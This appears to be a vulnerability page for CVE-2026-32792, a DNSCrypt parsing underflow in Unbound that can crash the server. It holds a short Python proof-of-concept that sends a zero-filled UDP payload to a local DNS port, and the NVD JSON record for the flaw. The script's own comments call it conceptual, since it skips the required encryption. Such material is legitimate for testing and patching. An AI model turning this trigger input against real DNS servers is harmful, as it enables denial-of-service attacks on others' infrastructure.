CVE-2026-32792

import socket # PoC for CVE-2026-32792 # This script sends a malicious DNSCrypt query payload to test the vulnerability. # Note: The payload must be encrypted with the target server's public key # to pass the initial decryption step and reach the vulnerable parsing logic. target_ip = "127.0.0.1" target_port = 53 # Malicious payload: Decrypted plaintext consisting entirely of 0x00 bytes # without the expected 0x80 marker. # The length should be sufficient to trigger the underflow/read overflow. # Assuming a typical DNSCrypt query structure, we craft a minimally valid # header filled with zeros. payload = b'\x00' * 64 # Example length, adjust based on specific dnscrypt padding requirements # In a real exploit scenario, this payload needs to be encrypted using # the DNSCrypt shared secret derived from the target's public key. # encrypted_payload = dnscrypt_encrypt(payload, public_key) # For demonstration, we send the raw payload structure (conceptual). # This requires the server to be configured with a specific client key # or the encryption logic to be bypassed for testing purposes. try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (target_ip, target_port)) print(f"Malicious packet sent to {target_ip}:{target_port}") sock.close() except Exception as e: print(f"Error sending packet: {e}")

{"cve": {"id": "CVE-2026-32792", "sourceIdentifier": "[email protected]", "published": "2026-05-20T10:16:26.277", "lastModified": "2026-05-20T22:44:09.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support ('--enable-dnscrypt'). A bad DNSCrypt query could underflow Unbound's DNSCrypt packet reading procedure that may lead to heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query that its decrypted plaintext consists entirely of '0x00' bytes and does not contain the expected '0x80' marker. Unbound would then start reading more bytes than necessary until it finds a non-'0x00' byte. Based on the underlying memory allocator and the memory layout, it could lead to heap overflow while reading followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound's later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Green", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-166"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nlnetlabs:unbound:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.2", "versionEndExcluding": "1.25.1", "matchCriteriaId": "E2A7CA69-1A30-44D8-A0FF-2A4853C6F6D9"}]}]}], "references": [{"url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}